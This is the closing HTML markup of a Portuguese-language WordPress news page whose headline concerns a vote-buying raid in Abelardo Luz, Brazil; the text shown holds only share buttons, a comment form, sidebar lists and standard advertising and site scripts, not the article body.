<div style="font-size: 0px; height: 0px; line-height: 0px; margin: 0; padding: 0; clear: both;"></div><div class="sharedaddy sd-sharing-enabled"><div class="robots-nocontent sd-block sd-social sd-social-icon sd-sharing"><h3 class="sd-title">Compartilhe isso:</h3><div class="sd-content"><ul><li class="share-twitter"><a rel="nofollow noopener noreferrer" data-shared="sharing-twitter-26698" class="share-twitter sd-button share-icon no-text" href="http://oiguassu.com/compra-de-votos-operacao-integrada-apreende-celulares-e-documentos-de-leonardo-marionete-cavalcanti-e-sid-orlando-em-abelardo-luz/?share=twitter" target="_blank" title="Clique para compartilhar no Twitter"><span></span><span class="sharing-screen-reader-text">Clique para compartilhar no Twitter(abre em nova janela)</span></a></li><li class="share-facebook"><a rel="nofollow noopener noreferrer" data-shared="sharing-facebook-26698" class="share-facebook sd-button share-icon no-text" href="http://oiguassu.com/compra-de-votos-operacao-integrada-apreende-celulares-e-documentos-de-leonardo-marionete-cavalcanti-e-sid-orlando-em-abelardo-luz/?share=facebook" target="_blank" title="Clique para compartilhar no Facebook"><span></span><span class="sharing-screen-reader-text">Clique para compartilhar no Facebook(abre em nova janela)</span></a></li><li class="share-telegram"><a rel="nofollow noopener noreferrer" data-shared="" class="share-telegram sd-button share-icon no-text" href="http://oiguassu.com/compra-de-votos-operacao-integrada-apreende-celulares-e-documentos-de-leonardo-marionete-cavalcanti-e-sid-orlando-em-abelardo-luz/?share=telegram" target="_blank" title="Clique para compartilhar no Telegram"><span></span><span class="sharing-screen-reader-text">Clique para compartilhar no Telegram(abre em nova janela)</span></a></li><li class="share-jetpack-whatsapp"><a rel="nofollow noopener noreferrer" data-shared="" class="share-jetpack-whatsapp sd-button share-icon no-text" href="http://oiguassu.com/compra-de-votos-operacao-integrada-apreende-celulares-e-documentos-de-leonardo-marionete-cavalcanti-e-sid-orlando-em-abelardo-luz/?share=jetpack-whatsapp" target="_blank" title="Clique para compartilhar no WhatsApp"><span></span><span class="sharing-screen-reader-text">Clique para compartilhar no WhatsApp(abre em nova janela)</span></a></li><li class="share-skype"><a rel="nofollow noopener noreferrer" data-shared="sharing-skype-26698" class="share-skype sd-button share-icon no-text" href="http://oiguassu.com/compra-de-votos-operacao-integrada-apreende-celulares-e-documentos-de-leonardo-marionete-cavalcanti-e-sid-orlando-em-abelardo-luz/?share=skype" target="_blank" title="Clique para compartilhar no Skype"><span></span><span class="sharing-screen-reader-text">Clique para compartilhar no Skype(abre em nova janela)</span></a></li><li class="share-linkedin"><a rel="nofollow noopener noreferrer" data-shared="sharing-linkedin-26698" class="share-linkedin sd-button share-icon no-text" href="http://oiguassu.com/compra-de-votos-operacao-integrada-apreende-celulares-e-documentos-de-leonardo-marionete-cavalcanti-e-sid-orlando-em-abelardo-luz/?share=linkedin" target="_blank" title="Clique para compartilhar no LinkedIn"><span></span><span class="sharing-screen-reader-text">Clique para compartilhar no LinkedIn(abre em nova janela)</span></a></li><li class="share-end"></li></ul></div></div></div>
<div id='jp-relatedposts' class='jp-relatedposts' >
	<h3 class="jp-relatedposts-headline"><em>Relacionado</em></h3>
</div>	</div>
	</article><div class="comments-wrap">
<h4 class="comment-section-title"><span class="comment-count">Seja o Primeiro a comentar</span> <span class="comment-count-more">on "Compra de Votos: OPERAÇÃO INTEGRADA APREENDE CELULARES E DOCUMENTOS DE LEONARDO “MARIONETE” CAVALCANTI E SID ORLANDO EM ABELARDO LUZ"</span></h4>
</div>
	<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title">Deixe um comentário <small><a rel="nofollow" id="cancel-comment-reply-link" href="/compra-de-votos-operacao-integrada-apreende-celulares-e-documentos-de-leonardo-marionete-cavalcanti-e-sid-orlando-em-abelardo-luz/#respond" style="display:none;">Cancelar resposta</a></small></h3><form action="http://oiguassu.com/wp-comments-post.php" method="post" id="commentform" class="comment-form"><p class="comment-notes">Seu email não será publicado.</p><p class="comment-form-comment"><label for="comment">Comentário</label><br/><textarea id="comment" name="comment" cols="45" rows="5" aria-required="true"></textarea></p><p class="comment-form-author"><label for="author">Name </label><span class="required">*</span><br/><input id="author" name="author" type="text" value="" size="30" aria-required='true' /></p>
<p class="comment-form-email"><label for="email">Email </label><span class="required">*</span><br/><input id="email" name="email" type="text" value="" size="30" aria-required='true' /></p>
<p class="comment-form-url"><label for="url">Website</label><br/><input id="url" name="url" type="text" value="" size="30" /></p>
<p class="comment-subscription-form"><input type="checkbox" name="subscribe_comments" id="subscribe_comments" value="subscribe" style="width: auto; -moz-appearance: checkbox; -webkit-appearance: checkbox;" /> <label class="subscribe-label" id="subscribe-label" for="subscribe_comments">Notifique-me sobre novos comentários por e-mail.</label></p><p class="comment-subscription-form"><input type="checkbox" name="subscribe_blog" id="subscribe_blog" value="subscribe" style="width: auto; -moz-appearance: checkbox; -webkit-appearance: checkbox;" /> <label class="subscribe-label" id="subscribe-blog-label" for="subscribe_blog">Notifique-me sobre novas publicações por e-mail.</label></p><p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Publicar comentário" /> <input type='hidden' name='comment_post_ID' value='26698' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p><p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="1f6e920126" /></p><p style="display: none;"><input type="hidden" id="ak_js" name="ak_js" value="196"/></p></form>	</div><!-- #respond -->
		</div>
	<aside class="mh-sidebar">
	<div id="search-2" class="sb-widget clearfix widget_search"><form role="search" method="get" class="search-form" action="http://oiguassu.com/">
				<label>
					<span class="screen-reader-text">Pesquisar por:</span>
					<input type="search" class="search-field" placeholder="Pesquisar &hellip;" value="" name="s" />
				</label>
				<input type="submit" class="search-submit" value="Pesquisar" />
			</form></div><div id="custom_html-7" class="widget_text sb-widget clearfix widget_custom_html"><div class="textwidget custom-html-widget"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- a -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-9260427313362027"
     data-ad-slot="4555141854"
     data-ad-format="auto"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div></div>
		<div id="recent-posts-2" class="sb-widget clearfix widget_recent_entries">
		<h4 class="widget-title"><span>Posts recentes</span></h4>
		<ul>
											<li>
					<a href="http://oiguassu.com/extra-extra-extra-leonardo-cavalcante-devera-ter-candidatura-a-vereador-impugnada/">Extra, Extra, Extra: LEONARDO CAVALCANTE DEVERÁ TER CANDIDATURA A VEREADOR IMPUGNADA</a>
									</li>
											<li>
					<a href="http://oiguassu.com/politica-abelardo-luz-uma-bela-cidade-e-atenta-3/">Política: ABELARDO LUZ, UMA BELA CIDADE, E ATENTA</a>
									</li>
											<li>
					<a href="http://oiguassu.com/compra-de-votos-operacao-integrada-apreende-celulares-e-documentos-de-leonardo-marionete-cavalcanti-e-sid-orlando-em-abelardo-luz/" aria-current="page">Compra de Votos: OPERAÇÃO INTEGRADA APREENDE CELULARES E DOCUMENTOS DE LEONARDO “MARIONETE” CAVALCANTI E SID ORLANDO EM ABELARDO LUZ</a>
									</li>
											<li>
					<a href="http://oiguassu.com/extra-extra-extra-justica-impoe-derrota-aos-2-parcas-de-abelardo/">Extra, Extra, Extra: JUSTIÇA IMPÕE DERROTA AOS 2 “PARÇAS” DE ABELARDO</a>
									</li>
											<li>
					<a href="http://oiguassu.com/ore-por-seu-irmao/">ORE POR SEU IRMÃO</a>
									</li>
					</ul>

		</div><div id="recent-comments-2" class="sb-widget clearfix widget_recent_comments"><h4 class="widget-title"><span>Comentários</span></h4><ul id="recentcomments"><li class="recentcomments"><span class="comment-author-link">Javier</span> em <a href="http://oiguassu.com/ciudad-del-este-comerciantes-solicitan-ampliacion-de-horario-para-turistas/#comment-470">Ciudad del Este: COMERCIANTES SOLICITAN AMPLIACIÓN DE HORARIO PARA TURISTAS</a></li><li class="recentcomments"><span class="comment-author-link">Juve</span> em <a href="http://oiguassu.com/historias-de-jesus/#comment-469">HISTÓRIAS DE JESUS</a></li><li class="recentcomments"><span class="comment-author-link">Itelmo Germano Deré</span> em <a href="http://oiguassu.com/triplice-fronteira-com-protocolo-sanitario-aprovado-e-sem-presidentes-ponte-da-amizade-pode-reabrir-nesta-semana/#comment-467">Tríplice Fronteira: COM PROTOCOLO SANITÁRIO APROVADO E SEM PRESIDENTES, PONTE DA AMIZADE REABRIU NESTA QUINTA (15)</a></li><li class="recentcomments"><span class="comment-author-link"><a href='https://cabezanews.com/revista-panrotas-lista-secretario-de-turismo-de-foz-do-iguacu-entre-os-100-mais-poderosos-do-setor-no-pais/' rel='external nofollow ugc' class='url'>Revista Panrotas lista secretário de Turismo de Foz do Iguaçu entre os 100 mais &quot;poderosos&quot; do setor no país</a></span> em <a href="http://oiguassu.com/turismo-panrotas-lista-secretario-de-turismo-de-foz-entre-os-100-mais-poderosos-do-setor-no-pais/#comment-465">Turismo: PANROTAS LISTA SECRETÁRIO DE TURISMO DE FOZ ENTRE OS 100 MAIS &#8220;PODEROSOS&#8221; DO SETOR NO PAÍS</a></li><li class="recentcomments"><span class="comment-author-link"><a href='http://www.oiguassu.com' rel='external nofollow ugc' class='url'>admin</a></span> em <a href="http://oiguassu.com/foz-do-iguacu-justica-proibe-mae-de-ver-bebe-que-quer-dar-alimentacao-vegetariana-a-crianca/#comment-459">Foz do Iguaçu: JUSTIÇA PROÍBE MÃE DE VER BEBÊ. ELA QUER DAR ALIMENTAÇÃO VEGETARIANA A CRIANÇA</a></li></ul></div><div id="archives-2" class="sb-widget clearfix widget_archive"><h4 class="widget-title"><span>Arquivos</span></h4>
			<ul>
					<li><a href='http://oiguassu.com/2020/11/'>novembro 2020</a></li>
	<li><a href='http://oiguassu.com/2020/10/'>outubro 2020</a></li>
	<li><a href='http://oiguassu.com/2020/09/'>setembro 2020</a></li>
	<li><a href='http://oiguassu.com/2020/08/'>agosto 2020</a></li>
	<li><a href='http://oiguassu.com/2020/07/'>julho 2020</a></li>
	<li><a href='http://oiguassu.com/2020/04/'>abril 2020</a></li>
	<li><a href='http://oiguassu.com/2020/03/'>março 2020</a></li>
	<li><a href='http://oiguassu.com/2019/12/'>dezembro 2019</a></li>
	<li><a href='http://oiguassu.com/2019/11/'>novembro 2019</a></li>
	<li><a href='http://oiguassu.com/2019/10/'>outubro 2019</a></li>
	<li><a href='http://oiguassu.com/2019/09/'>setembro 2019</a></li>
	<li><a href='http://oiguassu.com/2019/08/'>agosto 2019</a></li>
	<li><a href='http://oiguassu.com/2019/07/'>julho 2019</a></li>
	<li><a href='http://oiguassu.com/2019/06/'>junho 2019</a></li>
	<li><a href='http://oiguassu.com/2019/05/'>maio 2019</a></li>
	<li><a href='http://oiguassu.com/2019/04/'>abril 2019</a></li>
	<li><a href='http://oiguassu.com/2019/03/'>março 2019</a></li>
	<li><a href='http://oiguassu.com/2019/02/'>fevereiro 2019</a></li>
	<li><a href='http://oiguassu.com/2019/01/'>janeiro 2019</a></li>
	<li><a href='http://oiguassu.com/2018/12/'>dezembro 2018</a></li>
	<li><a href='http://oiguassu.com/2018/11/'>novembro 2018</a></li>
	<li><a href='http://oiguassu.com/2018/10/'>outubro 2018</a></li>
	<li><a href='http://oiguassu.com/2018/09/'>setembro 2018</a></li>
	<li><a href='http://oiguassu.com/2018/08/'>agosto 2018</a></li>
	<li><a href='http://oiguassu.com/2018/07/'>julho 2018</a></li>
	<li><a href='http://oiguassu.com/2018/06/'>junho 2018</a></li>
	<li><a href='http://oiguassu.com/2018/05/'>maio 2018</a></li>
	<li><a href='http://oiguassu.com/2018/04/'>abril 2018</a></li>
	<li><a href='http://oiguassu.com/2018/03/'>março 2018</a></li>
	<li><a href='http://oiguassu.com/2018/02/'>fevereiro 2018</a></li>
	<li><a href='http://oiguassu.com/2018/01/'>janeiro 2018</a></li>
	<li><a href='http://oiguassu.com/2017/12/'>dezembro 2017</a></li>
	<li><a href='http://oiguassu.com/2017/11/'>novembro 2017</a></li>
	<li><a href='http://oiguassu.com/2017/10/'>outubro 2017</a></li>
	<li><a href='http://oiguassu.com/2017/09/'>setembro 2017</a></li>
	<li><a href='http://oiguassu.com/2017/08/'>agosto 2017</a></li>
			</ul>

			</div><div id="categories-2" class="sb-widget clearfix widget_categories"><h4 class="widget-title"><span>Categorias</span></h4>
			<ul>
					<li class="cat-item cat-item-7"><a href="http://oiguassu.com/category/argentina/">Argentina</a>
</li>
	<li class="cat-item cat-item-4"><a href="http://oiguassu.com/category/brasil/">Brasil</a>
</li>
	<li class="cat-item cat-item-9"><a href="http://oiguassu.com/category/colunas/">Colunas</a>
</li>
	<li class="cat-item cat-item-17"><a href="http://oiguassu.com/category/colunas/e-direito/">É Direito</a>
</li>
	<li class="cat-item cat-item-312"><a href="http://oiguassu.com/category/economia/">Economia</a>
</li>
	<li class="cat-item cat-item-702"><a href="http://oiguassu.com/category/espaco-cristao/">Espaço Cristão</a>
</li>
	<li class="cat-item cat-item-725"><a href="http://oiguassu.com/category/colunas/espaco-cristao-colunas/">Espaço Cristão</a>
</li>
	<li class="cat-item cat-item-6"><a href="http://oiguassu.com/category/foz/">Foz do Iguaçu</a>
</li>
	<li class="cat-item cat-item-14"><a href="http://oiguassu.com/category/internacional/">Internacional</a>
</li>
	<li class="cat-item cat-item-12"><a href="http://oiguassu.com/category/latinoamerica/">Latinoamerica</a>
</li>
	<li class="cat-item cat-item-8"><a href="http://oiguassu.com/category/paraguay/">Paraguay</a>
</li>
	<li class="cat-item cat-item-5"><a href="http://oiguassu.com/category/parana/">Paraná</a>
</li>
	<li class="cat-item cat-item-308"><a href="http://oiguassu.com/category/politica/">Política</a>
</li>
	<li class="cat-item cat-item-370"><a href="http://oiguassu.com/category/triplice-fronteira/">Tríplice Fronteira</a>
</li>
	<li class="cat-item cat-item-170"><a href="http://oiguassu.com/category/trump/">tRUMP</a>
</li>
	<li class="cat-item cat-item-703"><a href="http://oiguassu.com/category/ultima-hora/">Última Hora</a>
</li>
	<li class="cat-item cat-item-1"><a href="http://oiguassu.com/category/uncategorized/">Uncategorized</a>
</li>
			</ul>

			</div><div id="meta-2" class="sb-widget clearfix widget_meta"><h4 class="widget-title"><span>Meta</span></h4>
		<ul>
						<li><a rel="nofollow" href="http://oiguassu.com/wp-login.php">Acessar</a></li>
			<li><a href="http://oiguassu.com/feed/">Feed de posts</a></li>
			<li><a href="http://oiguassu.com/comments/feed/">Feed de comentários</a></li>

			<li><a href="https://br.wordpress.org/">WordPress.org</a></li>
		</ul>

		</div></aside></div>
</div>
<footer class="mh-footer">
		<div class="wrapper-inner clearfix">
			</div>
	<div class="footer-bottom">
		<div class="wrapper-inner clearfix">
						<div class="copyright-wrap">
				<p class="copyright">
					Copyright 2020 | MH Newsdesk by <a href="http://www.mhthemes.com/" title="Premium Magazine WordPress Themes" rel="nofollow">MH Themes</a>				</p>
			</div>
		</div>
	</div>
</footer>

<!-- Infolinks START -->

<script type="text/javascript">
    var infolinks_pid = 3124372; 
    var infolinks_plugin_version = "WP_3.2.3"; 
    var infolinks_resources = "https://resources.infolinks.com/js"; 
</script>
<script type="text/javascript" src="https://resources.infolinks.com/js/infolinks_main.js" ></script>
<!-- Infolinks END -->
	<script type="text/javascript">
		window.WPCOM_sharing_counts = {"http:\/\/oiguassu.com\/compra-de-votos-operacao-integrada-apreende-celulares-e-documentos-de-leonardo-marionete-cavalcanti-e-sid-orlando-em-abelardo-luz\/":26698};
	</script>
				<link rel='stylesheet' id='mediaelement-css'  href='http://oiguassu.com/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css?ver=4.2.13-9993131' type='text/css' media='all' />
<link rel='stylesheet' id='wp-mediaelement-css'  href='http://oiguassu.com/wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=5.5.3' type='text/css' media='all' />
<script type='text/javascript' src='http://oiguassu.com/wp-includes/js/comment-reply.min.js?ver=5.5.3' id='comment-reply-js'></script>
<script type='text/javascript' src='http://oiguassu.com/wp-includes/js/wp-embed.min.js?ver=5.5.3' id='wp-embed-js'></script>
<script type='text/javascript' id='mediaelement-core-js-before'>
var mejsL10n = {"language":"pt","strings":{"mejs.download-file":"Fazer download do arquivo","mejs.install-flash":"Voc\u00ea est\u00e1 usando um navegador que n\u00e3o tem Flash ativo ou instalado. Ative o plugin do Flash player ou baixe a \u00faltima vers\u00e3o em https:\/\/get.adobe.com\/flashplayer\/","mejs.fullscreen":"Tela inteira","mejs.play":"Reproduzir","mejs.pause":"Pausar","mejs.time-slider":"Tempo do slider","mejs.time-help-text":"Use as setas esquerda e direita para avan\u00e7ar um segundo. Acima e abaixo para avan\u00e7ar dez segundos.","mejs.live-broadcast":"Transmiss\u00e3o ao vivo","mejs.volume-help-text":"Use as setas para cima ou para baixo para aumentar ou diminuir o volume.","mejs.unmute":"Desativar mudo","mejs.mute":"Mudo","mejs.volume-slider":"Controle de volume","mejs.video-player":"Tocador de v\u00eddeo","mejs.audio-player":"Tocador de \u00e1udio","mejs.captions-subtitles":"Transcri\u00e7\u00f5es\/Legendas","mejs.captions-chapters":"Cap\u00edtulos","mejs.none":"Nenhum","mejs.afrikaans":"Afric\u00e2ner","mejs.albanian":"Alban\u00eas","mejs.arabic":"\u00c1rabe","mejs.belarusian":"Bielorrusso","mejs.bulgarian":"B\u00falgaro","mejs.catalan":"Catal\u00e3o","mejs.chinese":"Chin\u00eas","mejs.chinese-simplified":"Chin\u00eas (simplificado)","mejs.chinese-traditional":"Chin\u00eas (tradicional)","mejs.croatian":"Croata","mejs.czech":"Checo","mejs.danish":"Dinamarqu\u00eas","mejs.dutch":"Holand\u00eas","mejs.english":"Ingl\u00eas","mejs.estonian":"Estoniano","mejs.filipino":"Filipino","mejs.finnish":"Finland\u00eas","mejs.french":"Franc\u00eas","mejs.galician":"Galega","mejs.german":"Alem\u00e3o","mejs.greek":"Grego","mejs.haitian-creole":"Crioulo haitiano","mejs.hebrew":"Hebraico","mejs.hindi":"Hindi","mejs.hungarian":"H\u00fangaro","mejs.icelandic":"Island\u00eas","mejs.indonesian":"Indon\u00e9sio","mejs.irish":"Irland\u00eas","mejs.italian":"Italiano","mejs.japanese":"Japon\u00eas","mejs.korean":"Coreano","mejs.latvian":"Let\u00e3o","mejs.lithuanian":"Lituano","mejs.macedonian":"Maced\u00f4nio","mejs.malay":"Malaio","mejs.maltese":"Malt\u00eas","mejs.norwegian":"Noruegu\u00eas","mejs.persian":"Persa","mejs.polish":"Polon\u00eas","mejs.portuguese":"Portugu\u00eas","mejs.romanian":"Romeno","mejs.russian":"Russo","mejs.serbian":"S\u00e9rvio","mejs.slovak":"Eslovaco","mejs.slovenian":"Esloveno","mejs.spanish":"Espanhol","mejs.swahili":"Sua\u00edli","mejs.swedish":"Sueco","mejs.tagalog":"Tagalo","mejs.thai":"Tailand\u00eas","mejs.turkish":"Turco","mejs.ukrainian":"Ucraniano","mejs.vietnamese":"Vietnamita","mejs.welsh":"Gal\u00eas","mejs.yiddish":"I\u00eddiche"}};
</script>
<script type='text/javascript' src='http://oiguassu.com/wp-includes/js/mediaelement/mediaelement-and-player.min.js?ver=4.2.13-9993131' id='mediaelement-core-js'></script>
<script type='text/javascript' src='http://oiguassu.com/wp-includes/js/mediaelement/mediaelement-migrate.min.js?ver=5.5.3' id='mediaelement-migrate-js'></script>
<script type='text/javascript' id='mediaelement-js-extra'>
/* <![CDATA[ */
var _wpmejsSettings = {"pluginPath":"\/wp-includes\/js\/mediaelement\/","classPrefix":"mejs-","stretching":"responsive"};
/* ]]> */
</script>
<script type='text/javascript' src='http://oiguassu.com/wp-includes/js/mediaelement/wp-mediaelement.min.js?ver=5.5.3' id='wp-mediaelement-js'></script>
<script type='text/javascript' src='http://oiguassu.com/wp-includes/js/mediaelement/renderers/vimeo.min.js?ver=4.2.13-9993131' id='mediaelement-vimeo-js'></script>
<script async="async" type='text/javascript' src='http://oiguassu.com/wp-content/plugins/akismet/_inc/form.js?ver=4.1.7' id='akismet-form-js'></script>
<script type='text/javascript' id='sharing-js-js-extra'>
/* <![CDATA[ */
var sharing_js_options = {"lang":"en","counts":"1","is_stats_active":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='http://oiguassu.com/wp-content/plugins/jetpack/_inc/build/sharedaddy/sharing.min.js?ver=8.9.1' id='sharing-js-js'></script>
<script type='text/javascript' id='sharing-js-js-after'>
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-twitter', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomtwitter', 'menubar=1,resizable=1,width=600,height=350' );
				return false;
			});
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-facebook', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomfacebook', 'menubar=1,resizable=1,width=600,height=400' );
				return false;
			});
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-telegram', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomtelegram', 'menubar=1,resizable=1,width=450,height=450' );
				return false;
			});
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-skype', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomskype', 'menubar=1,resizable=1,width=305,height=665' );
				return false;
			});
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-linkedin', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomlinkedin', 'menubar=1,resizable=1,width=580,height=450' );
				return false;
			});
</script>
<script type='text/javascript' src='https://stats.wp.com/e-202047.js' async='async' defer='defer'></script>
<script type='text/javascript'>
	_stq = window._stq || [];
	_stq.push([ 'view', {v:'ext',j:'1:8.9.1',blog:'12891280',post:'26698',tz:'-3',srv:'oiguassu.com'} ]);
	_stq.push([ 'clickTrackerInit', '12891280', '26698' ]);
</script>
</body>
</html>